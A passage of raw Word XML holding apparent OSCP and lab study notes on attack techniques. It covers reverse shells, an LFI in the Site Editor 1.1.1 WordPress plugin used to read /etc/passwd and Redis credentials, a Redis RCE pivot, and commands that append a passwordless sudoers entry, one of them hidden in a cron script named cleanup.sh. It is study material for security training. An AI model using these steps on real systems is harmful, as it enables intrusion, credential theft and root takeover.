    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They used it to upload a web shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But them they claimed they had a hard time getting back a reverse shell from it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DFF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So they decided to edit the payload of the exploit and instead of a webshell, they uploaded a PHP reverse shell and it worked!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E00">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E01">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this </w:t>
      </w:r>
      <w:hyperlink r:id="rId1013">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">writeup</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:hyperlink r:id="rId1014">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the medium original)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1356"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They uploaded reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1356"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then checked python3 version and verified python3 was there</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E04">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1356"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then URL encoded python rev shell and sent it, and it worked!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E05">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E06">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E07">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tei6hcu4oic2" w:id="408"/>
      <w:bookmarkEnd w:id="408"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to get LFI with Site Editor 1.1.1 plugin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E08">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E09">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:hyperlink r:id="rId1015">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Readys</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice. We found this plugin from WPScan, and it was actually up-to-date according to the scan, but we searched it up anyways and we found this LFI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1016">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/44340</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E0B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E0C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We then used it to read </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/apache2/sites-enabled/000-default.conf </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">in order to find the apache web root directory </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E0D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E0E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We then saw </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Redis </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and used it to read /etc/redis/redis.conf where the redis credentials are stored so that we can use it to authenticate and run the Redis RCE exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E0F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="843"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1017">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/Ridter/redis-rce</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E10">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E11">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then once they got a shell as another user, they put a reverse shell into the machine, and then used the LFI to trigger the rev shell, allowing them to pivot to the user who runs the apache server, which is Alice. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E12">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E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14">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_i712xb90eicy" w:id="409"/>
      <w:bookmarkEnd w:id="409"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to add a sudo user if you can edit /etc/sudoers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E15">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E16">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Just add append this line:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E17">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1266"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">michael ALL=(ALL:ALL) ALL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E18">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1266"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Where michael is the name of your user</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E19">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E1A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or if you are trying to do it through a cron job, then do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E1B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1306"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo 'echo "michael ALL=(ALL) NOPASSWD:ALL" &gt;&gt; /etc/sudoers' &gt; cleanup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1306"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This puts it into a file called cleanup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E1D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1306"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or just put it in manually to a file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E1E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1306"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "michael ALL=(ALL) NOPASSWD:ALL" &gt;&gt; /etc/sudoers</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E1F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1306"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Put the entire thing into a file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E20">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E21">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then you can run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -i </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to get root shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E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23">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E24">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jcwm4xjidfm" w:id="410"/>
      <w:bookmarkEnd w:id="410"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to add sudo user if you have root privileges (get out of limited shell)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E25">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E26">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Adding a sudo user is one way to get out of a limited shell, and then you can SSH into it, and then run "sudo -i" for root shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E27">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E28">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP-C .156 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">when I got root but in a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">per-command executor/wrapper,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> meaning that I couldn't escape the current directory, and it didn't feel like a fully interactive shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E29">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1464"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> add another user and add them to the sudo group</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
